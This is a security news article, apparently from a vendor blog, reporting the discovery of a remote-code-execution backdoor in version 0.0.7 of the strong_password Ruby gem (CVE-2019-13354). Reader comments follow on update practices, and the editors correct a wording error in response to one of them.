An eagle-eyed developer has discovered a backdoor recently sneaked into a library (or ‘gem’) used by Ruby on Rails (RoR) web apps to check password strength.
A close shave, then. While the Ruby scripting language and RoR aren’t as popular as they once were, they’re still embedded in numerous enterprise development environments, an unknown number of which might have used the library, strong_password, in its infected version 0.0.7.
The discovery came about after Epion Health developer, Tute Costa, noticed something unusual when carefully updating a family of libraries used by his company’s dev to fix bugs and security vulnerabilities.
When he looked at the strong_password gem on RubyGems.org, he couldn’t locate a changelog explaining how it got to the updated version from 0.0.6, an event which happened on 25 June 2019.
The previous GitHub version had been updated in October 2018. Comparing the two versions, he noticed the mystery 0.0.7 version embedded a download link which:
Fetches and runs the code stored in a pastebin.com, only if running in production, with an empty exception handling that ignores any error it may raise.
The backdoor would download code from the Pastebin address for production sites, giving the attackers the power of remote code execution, silently hijacking any websites unfortunate to have updated to the rogue strong_password gem.
Adding to this, the versions had been published by an empty account under a different name (probably the victim of a Pastebin account hijacking) to the official maintainer, Brian McManus, who replied to an email from Costa to say:
The gem seems to have been pulled out from under me… When I login to rubygems.org I don’t seem to have ownership now.
The latest issue is identified as CVE-2019-13354. The infected library has now been pulled and replaced with 0.0.8.
Part of a pattern
This wasn’t a speculative attack – somebody thought about what they were doing and set out to insert the backdoor in a way that might not be noticed straight away.
It also fits a troubling pattern of recent targeting of Ruby libraries, including the RCE discovered inside the Bootstrap-Sass Ruby library in April.
That hijacking was noticed even quicker than strong_password’s, but the sheer number of libraries used by RoR (and other development frameworks in the firing line) raises the issue of how much oversight is appropriate when new versions appear.
Luckily, on this occasion, a developer was paying attention. When it comes to security, sometimes someone noticing that something is awry is all that stands between a large community of developers and disaster.
Laurence Marks
Oh! Now look what you’ve gone and done. You’ve just given operators an excuse to not install new updates until others have had a chance to vet them for a few weeks. So much for quick updates to counter zero-day exploits.
John E Dunn
How so? The moral of this incident surely is the need to look for and study changelogs before applying any update. That’s not the same as saying updates shouldn’t be applied.
Murray
My grandson installed sppeed dial on my phone so,, I don’t have to call the operators
Comment Crew
Note to self: Remember to update change log when slipping malware into a library.
ClothedSecurity
> many of which might have used the default library, strong_password, in its infected version 0.0.7.
This gem is not a default library for Ruby on Rails or Ruby, this can be trivially checked here: https://rubygems.org/gems/strong_password/reverse_dependencies
Please check your facts before writing a blog post and don’t use manipulative wording to misrepresent them. Ironic when you write a blog post about oversights, how you have a pretty big of an oversight by yourself just to have a bit more of a sensationalist text.
Anna Brading
Thanks for your feedback. We’ve corrected the paragraph.
John E Dunn
The word ”default’ was an error – we’ve removed that because, as you rightly say, that’s not the case.
However, the broader theme of attackers manipulating libraries is important, even if the number of organisations who downloaded this particular rogue update was small.
njorl
“all that stands between a large community of developers and disaster” – would not that disaster also have affected the end users?